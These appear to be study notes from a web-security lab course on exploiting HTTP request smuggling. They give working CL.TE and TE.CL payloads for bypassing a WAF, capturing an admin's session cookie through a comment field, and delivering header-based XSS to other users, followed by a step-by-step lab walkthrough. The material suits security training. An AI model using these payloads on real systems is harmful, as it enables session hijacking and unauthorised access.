# Exploitation Techniques ## Overview HTTP request smuggling vulnerabilities have **high impact** because they enable: | Attack Type | Impact | | --------------------- | ------------------------------------- | | **WAF Bypass** | Access restricted paths/endpoints | | **Session Hijacking** | Steal user cookies/tokens | | **Forced Actions** | Make users perform unintended actions | | **Data Theft** | Capture personal/sensitive data | | **XSS Amplification** | Exploit otherwise unexploitable XSS | *** ## 1. Bypassing Security Controls (WAFs) ### How WAFs Work WAFs examine: * URL paths and query parameters * Request headers * Request body content * Compute maliciousness scores **Blocking rules examples:** * Block requests to `/internal/` from external IPs * Block requests containing SQL injection patterns * Block requests with XSS payloads ### Why Smuggling Bypasses WAFs ``` WAF examines: Request URL, headers, visible body Smuggled: Hidden in body, parsed as separate request by back-end ``` The smuggled request is **never treated as a query string** by the WAF! ### CL.TE WAF Bypass Payload ```http POST / HTTP/1.1 Host: vuln.htb Content-Length: 64 Transfer-Encoding: chunked 0 POST /internal/index.php HTTP/1.1 Host: localhost Dummy: ``` **WAF sees**: POST to `/` (allowed) **Back-end sees**: POST to `/internal/index.php` (executed!) ### TE.CL WAF Bypass Payload ```http GET / HTTP/1.1 Host: vuln.htb Content-Length: 4 Transfer-Encoding: chunked 35 GET /internal/index.php HTTP/1.1 Host: localhost 0 ``` **WAF sees**: GET to `/` (allowed) **Back-end sees**: GET to `/internal/index.php` (executed!) *** ## 2. Stealing User Data ### The Technique Force victims to **submit their request data** to a location you control (e.g., comment section, log file, API endpoint). ### Scenario * Web app has comment functionality * Comments are publicly visible * App is vulnerable to CL.TE ### Comment POST Request (Normal) ```http POST /comments.php HTTP/1.1 Host: stealingdata.htb Content-Length: 43 Content-Type: application/x-www-form-urlencoded name=htb-stdnt&comment=Hello+World%21 ``` ### Data Stealing Payload ```http POST / HTTP/1.1 Host: stealingdata.htb Content-Type: application/x-www-form-urlencoded Content-Length: 154 Transfer-Encoding: chunked 0 POST /comments.php HTTP/1.1 Host: stealingdata.htb Content-Type: application/x-www-form-urlencoded Content-Length: 300 name=hacker&comment=test ``` ### What Happens **Admin's normal request:** ```http GET / HTTP/1.1 Host: stealingdata.htb Cookie: sess= ``` **Back-end sees smuggled request + admin's request appended:** ```http POST /comments.php HTTP/1.1 Host: stealingdata.htb Content-Type: application/x-www-form-urlencoded Content-Length: 300 name=hacker&comment=testGET / HTTP/1.1 Host: stealingdata.htb Cookie: sess= ``` ### Result The comment section now contains: ``` Hacker: testGET / HTTP/1.1 Host: stealingdata.htb Cookie: sess= ``` **Session cookie stolen!** 🎯 *** ## TCP Stream Analysis - Data Theft ### Reverse Proxy View ``` [Request 1: Our POST with smuggled comment request in body] [Request 2: Admin's GET / with session cookie] ``` ### Web Server View ``` [Request 1: Our POST / - empty body after chunk terminator] [Request 2: POST /comments.php with admin's request as comment parameter] ``` The smuggled request ends with `comment=test` - admin's entire request becomes the comment value! *** ## Critical Considerations ### Content-Length Tuning The `Content-Length` in smuggled request is crucial: | CL Value | Result | | -------------- | ----------------------------- | | **Too small** | Only partial data captured | | **Too large** | Timeout waiting for more data | | **Just right** | Full request captured | **Strategy**: Trial and error, start with \~300 and adjust. ### Required Parameters When smuggling authenticated actions, include: * Your session cookie (`Cookie` header) * CSRF tokens (if required) * All mandatory form fields ### Parameter Ordering Place CSRF tokens **at the beginning** of smuggled body: ```http csrf=token123&name=hacker&comment=test ``` If CSRF is at the end, appended victim data may invalidate it. *** ## Practical Exploitation Flow ### Step 1: Confirm Vulnerability Test for CL.TE with HELLO + 405 technique. ### Step 2: Authenticate (if needed) Log in to get valid session cookie and CSRF token. ### Step 3: Identify Data Sink Find where victim data can be captured: * Comment sections * Profile updates * Log files * API responses ### Step 4: Craft Payload ```http POST / HTTP/1.1 Host: target.htb Content-Type: application/x-www-form-urlencoded Content-Length: 235 Transfer-Encoding: chunked 0 POST /comments.php HTTP/1.1 Host: target.htb Content-Type: application/x-www-form-urlencoded Content-Length: 300 Cookie: PHPSESSID= csrf=&name=Hacker&comment=Stolen: ``` ### Step 5: Send and Wait 1. Send smuggling request 2. Wait \~10 seconds for victim 3. Check data sink for captured data ### Step 6: Use Stolen Credentials Replace your cookie with victim's stolen cookie: ``` Developer Tools → Application → Cookies → Edit session value ``` *** ## 3. Mass Exploitation of Reflected XSS ### The Problem with Header-Based XSS Reflected XSS in HTTP headers (e.g., `Host`, custom headers) is usually **unexploitable**: ```http GET / HTTP/1.1 Host: vuln.htb Vuln: "> ``` You **cannot force** a victim's browser to send custom headers! ### Solution: Request Smuggling + XSS Smuggle a request that injects XSS payload into victim's response. ### XSS Exploitation Payload (CL.TE) ```http POST / HTTP/1.1 Host: vuln.htb Content-Length: 63 Transfer-Encoding: chunked 0 GET / HTTP/1.1 Vuln: "> Dummy: ``` ### What Happens 1. Our smuggled request with XSS in `Vuln` header left in buffer 2. Victim sends normal request 3. Victim's request merges with our smuggled request 4. Back-end processes request with XSS payload 5. Victim receives response containing XSS 6. XSS executes in victim's browser! ### Attack Flow ``` Attacker Server Victim │ │ │ │ Smuggle XSS payload │ │ │─────────────────────────>│ │ │ │ │ │ │ XSS payload in buffer │ │ │ │ │ │ Normal GET / │ │ │<──────────────────────────│ │ │ │ │ │ Merges with XSS payload │ │ │ │ │ │ Response with XSS │ │ │──────────────────────────>│ │ │ │ │ │ XSS EXECUTES! ``` ### Impact * **No user interaction** required (unlike normal reflected XSS) * **Mass exploitation** - affects all users visiting after your payload * **Exploit "unexploitable"** header-based XSS vulnerabilities *** ## Summary: Exploitation Matrix | Technique | Vulnerability Type | Goal | Payload Location | | --------------------- | ------------------ | ------------------------ | ----------------- | | **WAF Bypass** | CL.TE / TE.CL | Access restricted paths | Smuggled URL | | **Data Theft** | CL.TE | Steal cookies/tokens | Comment parameter | | **Forced Actions** | CL.TE | Make user perform action | Smuggled request | | **XSS Amplification** | CL.TE / TE.CL | Execute XSS on victims | Smuggled header | *** ## Lab Walkthrough Summary ### Data Theft Scenario 1. **Test** for CL.TE vulnerability (HELLO + 405) 2. **Authenticate** with provided credentials 3. **Post** a test comment to capture the request format 4. **Craft** smuggling payload with comment endpoint 5. **Send** and wait for admin to visit 6. **Check** comments for leaked admin request 7. **Extract** session cookie from comment 8. **Replace** your cookie with admin's 9. **Access** admin panel *** ## References * [PortSwigger - Exploiting HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling/exploiting) * [HTTP Desync Attacks - James Kettle](https://portswigger.net/research/http-desync-attacks) * [Request Smuggling to XSS](https://portswigger.net/web-security/request-smuggling/exploiting/lab-deliver-reflected-xss)